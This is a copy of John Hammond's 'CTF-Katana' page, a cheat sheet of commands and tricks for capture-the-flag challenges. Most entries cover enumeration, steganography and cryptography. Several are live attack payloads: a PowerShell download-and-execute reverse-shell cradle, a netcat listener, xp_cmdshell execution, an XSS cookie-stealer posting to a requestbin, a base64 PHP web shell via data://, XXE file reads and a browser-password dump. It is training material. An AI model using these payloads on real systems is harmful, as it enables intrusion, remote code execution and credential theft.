Home

Awesome

CTF-Katana

John Hammond | February 1st, 2018


This repository, at the time of writing, will just host a listing of tools and commands that may help with CTF challenges. I hope to keep it as a "live document," and ideally it will not die out like the old "tools" page I had made (https://github.com/USCGA/tools).

The formal tool that automates some of this low-hanging fruit checking is finally released. Katana is available at https://github.com/JohnHammond/katana. Pull-requests and contributions are welcome!


Table of Contents

  1. Post-Exploitation
  2. Port Enumeration
  3. 445 (smb/Samba)
  4. 1433 (Microsoft SQL Server)
  5. SNMP
  6. Microsoft Office Macros
  7. Retrieving Network Service Hashes
  8. Windows Reverse Shells
  9. Known Exploits
  10. Excess
  11. Esoteric Languages
  12. Steganography
  13. Cryptography
  14. Networking
  15. PHP
  16. PDF Files
  17. Forensics
  18. PNG File Forensics
  19. APK Forensics
  20. Web
  21. Reverse Engineering
  22. PowerShell
  23. Windows Executables
  24. Python Reversing
  25. Binary Exploitation/pwn
  26. VisualBasicScript Reversing
  27. Miscellaneous
  28. Jail Breaks
  29. Trivia

Post-Exploitation

Port Enumeration

445 (smb/Samba)

smbmap -H 10.10.10.125 -u anonymous

Or you can attempt just:

smbmap -H 10.10.10.125

And you can specify a domain like so:

smbmap -H 10.10.10.125 -u anonymous -d HTB.LOCAL

Worth trying localhost as a domain, if that gets "NO_LOGON_SERVERS"

smbmap -H 10.10.10.125 -u anonymous -d localhost
enum4linux 10.10.10.125
smbclient -m SMB2 -N -L //10.10.10.125/

Once you find a share you want to/can access, you can connect to shares by using the name following the locator:

smbclient -m SMB2 -N //10.10.10.125/Reports

You will see a smb: \> prompt, and you can use ls and get to retrieve files or even put if you need to place files there.

1433 (Microsoft SQL Server)

mssqlclient.py username@10.10.10.125

It will prompt you for a password. If your password fails, the server might be using "Windows authentication", which you can use with:

mssqlclient.py username@10.10.10.125 -windows-auth

If you have access to a Micosoft SQL Server, you can try and enable_xp_cmdshell to run commands. With mssqlclient.py you can try:

SQL> enable_xp_cmdshell

though, you may not have permission. If that DOES succeed, you can now run commands like:

SQL> xp_cmdshell whoami

SNMP

snmp-check 10.10.10.125

Microsoft Office Macros

olevba "Currency Volume Report.xlsm"

Retrieving Network Service Hashes

./Responder.py -I tun0

Windows Reverse Shells

python -m SimpleHTTPServer

and then on the victim machine:

powershell IEX( New-Object Net.WebClient).DownloadString("http://10.10.14.6:8000/reverse.ps1") )

Also, if you want to have nice up and down arrow key usage within your Windows reverse shell, you can use the utility rlwrap before your netcat listener command.

rlwrap nc -lnvp 9001

Known Exploits

Excess

Esoteric Languages

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++++++++++++++.--.--------------.+++++++++++++.----.-----------
--.++++++++++++.--------.<------------.<++.>>----.+.<+++++++++++.+++++++++++++.>+++++++++++++++++.-------------
--.++++.+++++++++++++++.<<.>>-------.<+++++++++++++++.>+++..++++.--------.+++.<+++.<++++++++++++++++++++++++++
.<++++++++++++++++++++++.>++++++++++++++..>+.----.>------.+++++++.--------.<+++.>++++++++++++..-------.++.
 MoO moO MoO mOo MOO OOM MMM moO moO
 MMM mOo mOo moO MMM mOo MMM moO moO
 MOO MOo mOo MoO moO moo mOo mOo moo
(=<`#9]~6ZY32Vx/4Rs+0No-&Jk)"Fh}|Bcy?`=*z]Kw%oG4UUS0/@-ejc(:'8dc

https://www.bertnase.de/npiet/hi.png

Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.
Ook. Ook. Ook. Ook. Ook! Ook? Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook? Ook! Ook! Ook? Ook! Ook? Ook.
Ook! Ook. Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.
Ook. Ook. Ook! Ook? Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook?
Ook! Ook! Ook? Ook! Ook? Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook.
Midnight takes your heart and your soul
While your heart is as high as your soul
Put your heart without your soul into your heart

Give back your heart


Desire is a lovestruck ladykiller
My world is nothing
Fire is ice
Hate is water
Until my world is Desire,
Build my world up
If Midnight taking my world, Fire is nothing and Midnight taking my world, Hate is nothing
Shout "FizzBuzz!"
Take it to the top

If Midnight taking my world, Fire is nothing
Shout "Fizz!"
Take it to the top

If Midnight taking my world, Hate is nothing
Say "Buzz!"
Take it to the top

Whisper my world

Steganography

WHEN GIVEN A FILE TO WORK WITH, DO NOT FORGET TO RUN THIS STEGHIDE WITH AN EMPTY PASSWORD!

mplayer -af scaletempo -speed 64 flag.mp3
exiftool -b -ThumbnailImage my_image.jpg > my_thumbnail.jpg

https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQSySxHjMFv80XWp74LZpfrnAro6a1MLqeF1F3zpguA5PGSW9ov

sudo apt install zbar-tools

Cryptography

"UOYMORFEDIHOTGNIYRTEBTHGIMFTCA.TAHTTERCESASISIHT"[::-1]

IF YOU KNOW A DECENT CRIB (PLAINTEXT), USE CYBERCHEF TO HELP DETERMINE THE KEY

DO NOT FORGET TO JUST BRUTEFORCE JUST THE FIRST BYTE, OR TWO BYTES OR THREE BYTES.

phi = (a - 1) * (b - 1) * (c - 1)    # ... etcetera

If FactorDB cannot find factors, try alpertron: https://www.alpertron.com.ar/ECM.HTM

def root3rd(x):
    y, y1 = None, 2
    while y!=y1:
        y = y1
        y3 = y**3
        d = (2*y3+x)
        y1 = (y*(y3+2*x)+d//2)//d
    return y

https://www.marvindisplay.com/images/SignalFlags.gif

The daggers cipher is another silly text-to-image encoder. This is the key, and you can find a decoder on https://www.dcode.fr/daggers-alphabet.

img/dagger_cipher.png

The Hylian language is another silly text-to-image encoder. This is the key, and you can find a decoder on https://www.dcode.fr/hylian-language-twilight-princess.

img/hylian.png

The Hylian language is another silly text-to-image encoder. This is the key, and you can find a decoder on https://www.dcode.fr/hylian-language-breath-of-the-wild.

img/botw.jpg

The Sheikah language is another silly text-to-image encoder. This is the key, and you can find a decoder on https://www.dcode.fr/sheikah-language.

img/sheikah.png

The hexhue is an another tex-to-image enocder. you can find a decoder on https://www.boxentriq.com/code-breaking/hexahue

img

Networking

editcap old_file.pcapng new_file.pcap
tcpflow -r my_file.pcap
ls -1t | head -5 # see the last 5 recently modified files

PHP

PlaintextMD5 Hash
2406107080e462097431906509019562988736854
QLTHNDT0e405967825401955372549139051580
QNKCDZO0e830400451993494058024219903391
PJNPDWY0e291529052894702774557631701704
NWWKITQ0e763082070976038347657360817689
NOOPCJF0e818888003657176127862245791911
MMHUWUV0e701732711630150438129209816536
MAUXXQC0e478478466848439040434801845361
IHKFRNS0e256160682445802696926137988570
GZECLQZ0e537612333747236407713628225676
GGHMVOE0e362766013028313274586933780773
GEGHBXL0e248776895502908863709684713578
EEIZDOI0e782601363539291779881938479162
DYAXWCA0e424759758842488633464374063001
DQWRASX0e742373665639232907775599582643
BRTKUJZ00e57640477961333848717747276704
ABJIHVY0e755264355178451322893275696586
aaaXXAYW0e540853622400160407992788832284
aabg7XSs0e087386482136013740957780965295
aabC9RqS0e041022518165728065344349536299
0e2159620170e291242476940776845150308577824
PlaintextSHA1 Hash
aaroZmOk0e66507019969427134894567494305185566735
aaK1STfY0e76658526655756207688271159624026011393
aaO8zKZF0e89257456677279068558073954252716165668
aa3OFF9m0e36977786278517984959260394024281014729
PlaintextMD4 Hash
bhhkktQZ0e949030067204812898914975918567
0e0012333333333333345577788890e434041524824285414215559233446
0e000001112223333336667888888890e641853458593358523155449768529
00012356666666888888888880e832225036643258141969031181899
http://xqi.cc/index.php?m=php://filter/convert.base64-encode/resource=index
http://103.5.112.91:1234/?cmd=whoami&page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=

PDF Files

Forensics

python dumpzilla.py .mozilla/firefox/c3a958fk.default/ --Downloads --History --Bookmarks --Passwords
sudo apt install foremost
	sudo apt install binwalk

PNG File Forensics

APK Forensics

apktool d <file.apk>

Web

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
Typically you use this to steal cookies or other information, and you can do this with an online requestbin.
<img src="#" onerror="document.location='http://requestbin.fullcontact.com/168r30u1?c' + document.cookie">
#!/usr/bin/env python

import cfscrape

url = 'http://yashit.tech/tryharder/'

scraper = cfscrape.create_scraper()
print scraper.get(url).content

Sometimes, given an Mac autologin password file /etc/kcpassword, you can crack it with this code:

def kcpasswd(ciphertext):
    key = '7d895223d2bcddeaa3b91f'
    while len(key) < (len(ciphertext)*2):
        key = key + key
    key = binasciiunhexlify(key)
    result = ''
    for i in range(len(ciphertext)):
        result += chr(ord(ciphertext[i]) ^ (key[i]))
    return result

An XML External Entity attack is a type of attack against an application that parses XML input and allows XML entities. XML entities can be used to tell the XML parser to fetch specific content on the server. We try to display the content of the file /flag :

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM "file:///flag">
]>
<data>&file;</data>

<?xml version="1.0" encoding="UTF-16"?>
  <!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///flag" >]><foo>&xxe;</foo>

Get MongoDB properly installed:

sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv 9DA31620334BD75D9DCB49F368818C72E52529D4
echo "deb [ arch=amd64,arm64 ] https://repo.mongodb.org/apt/ubuntu xenial/mongodb-org/4.0 multiverse" | sudo tee /etc/apt/sources.list.d/mongodb-org-4.0.list
sudo apt-get update
sudo apt-get install -y mongodb-org

Connect to a remote server with credentials:

mongo --username 'uname' -p 'pword' --host hostname.com:27017

Print out the database info:

show databases

use <databasename>

show collections

c = db.<collectioname>

c.find()

aws s3 cp --recursive --no-sign-request s3://<bucket_name> .
i. e. `aws s3 cp --recursive --no-sign-request s3://tamuctf .`

Reverse Engineering

PowerShell

Windows Executables

Python Reversing

Binary Exploitation/pwn

Miscellaneous

# VisualBoyAdvance
sudo add-apt-repository universe
sudo apt install visualboyadvance

# RetroArch
sudo add-apt-repository ppa:libretro/stable && sudo apt-get update && sudo apt-get install -y retroarch* libretro-*
Base64:
TWFuIGlzIGRpc3Rpbmd1aXNoZWQsIG5vdCBvbmx5IGJ5IGhpcyByZWFzb24sIGJ1dCBieSB0aGlz
IHNpbmd1bGFyIHBhc3Npb24gZnJvbSBvdGhlciBhbmltYWxzLCB3aGljaCBpcyBhIGx1c3Qgb2Yg
dGhlIG1pbmQsIHRoYXQgYnkgYSBwZXJzZXZlcmFuY2Ugb2YgZGVsaWdodCBpbiB0aGUgY29udGlu
dWVkIGFuZCBpbmRlZmF0aWdhYmxlIGdlbmVyYXRpb24gb2Yga25vd2xlZGdlLCBleGNlZWRzIHRo
ZSBzaG9ydCB2ZWhlbWVuY2Ugb2YgYW55IGNhcm5hbCBwbGVhc3VyZS4=
Base32
ORUGS4ZANFZSAYLOEBSXQYLNOBWGKIDPMYQGEYLTMUZTELRANF2CA2LTEB3GS43JMJWGKIDCPEQGY33UOMQG6ZRAMNQXA2LUMFWCA3DFOR2GK4TTEBQW4ZBANVXXEZJAMVYXKYLMOMQHG2LHNZZSAZTPOIQHAYLEMRUW4ZZMEBSXQ5DSME======
Base85:
<~9jqo^BlbD-BleB1DJ+*+F(f,q/0JhKF<GL>Cj@.4Gp$d7F!,L7@<6@)/0JDEF<G%<+EV:2F!,
O<DJ+*.@<*K0@<6L(Df-\0Ec5e;DffZ(EZee.Bl.9pF"AGXBPCsi+DGm>@3BB/F*&OCAfu2/AKY
i(DIb:@FD,*)+C]U=@3BN#EcYf8ATD3s@q?d$AftVqCh[NqF<G:8+EV:.+Cf>-FD5W8ARlolDIa
l(DId<j@<?3r@:F%a+D58'ATD4$Bl@l3De:,-DJs`8ARoFb/0JMK@qB4^F!,R<AKZ&-DfTqBG%G
>uD.RTpAKYo'+CT/5+Cei#DII?(E,9)oF*2M7/c~>
Base91:
8D$J`/wC4!c.hQ;mT8,<p/&Y/H@$]xlL3oDg<W.0$FW6GFMo_D8=8=}AMf][|LfVd/<P1o/1Z2(.I+LR6tQQ0o1a/2/WtN3$3t[x&k)zgZ5=p;LRe.{B[pqa(I.WRT%yxtB92oZB,2,Wzv;Rr#N.cju"JFXiZBMf<WMC&$@+e95p)z01_*UCxT0t88Km=UQJ;WH[#F]4pE>i3o(g7=$e7R2u>xjLxoefB.6Yy#~uex8jEU_1e,MIr%!&=EHnLBn2h>M+;Rl3qxcL5)Wfc,HT$F]4pEsofrFK;W&eh#=#},|iKB,2,W]@fVlx,a<m;i=CY<=Hb%}+},F
𤇃𢊻𤄻嶜𤄋𤇁𡊻𤄛𤆬𠲻𤆻𠆜𢮻𤆻ꊌ𢪻𤆻邌𤆻𤊻𤅋𤲥𣾻𤄋𥆸𣊻𤅛ꊌ𤆻𤆱炼綻𤋅𤅴薹𣪻𣊻𣽻𤇆𤚢𣺻赈𤇣綹𤻈𤇣𤾺𤇃悺𢦻𤂻𤅠㢹𣾻𤄛𤆓𤦹𤊻𤄰炜傼𤞻𢊻𣲻𣺻ꉌ邹𡊻𣹫𤅋𤇅𣾻𤇄𓎜𠚻𤊻𢊻𤉛𤅫𤂑𤃃𡉌𤵛𣹛𤁐𢉋𡉻𡡫𤇠𠞗𤇡𡊄𡒌𣼻燉𣼋𦄘炸邹㢸𠞻𠦻𡊻𣈻𡈻𣈛𡈛ꊺ𠆼𤂅𣻆𣫃𤮺𤊻𡉋㽻𣺬𣈛𡈋𤭻𤂲𣈻𤭻𤊼𢈛儛𡈛ᔺ
sudo apt install -y caca-utils

http://www.virtual-egypt.com/newhtml/hieroglyphics/sample/alphabet.gif

NWEyYTk5ZDNiYWEwN2JmYmQwOGI5NjEyMDVkY2FlODg3ZmIwYWNmOWYyNzI5MjliYWE3OTExZmFhNGFlNzc1MQ==
Decoded, it is a hash: `5a2a99d3baa07bfbd08b961205dcae887fb0acf9f272929baa7911faa4ae7751`.

If you can find an AES ECB key along with (usually represented in hex or another encoding), you can decipher like so:
openssl enc -d -aes-256-ecb -in <(printf %s '5a2a99d3baa07bfbd08b961205dcae887fb0acf9f272929baa7911faa4ae7751' | xxd -r -p) -K '6fb3b5b05966fb06518ce6706ec933e79cfaea8f12b4485cba56321c7a62a077'
MCA{I$love$bitcoin$so$much!}
echo *
echo /any/path/*
mapfile -t  < /etc/passwd
printf "$s\n" "${anything[@]}"

Jail Breaks

Sometimes you're jailed in an environment where you can potentially execute code.

Trivia

Cookie
base64
CVE-2020-0601
Bombe
aad3b435b51404eeaad3b435b51404ee
KGS!@#$%
MalwareTech
ICMP
OpenToAll - https://opentoallctf.github.io/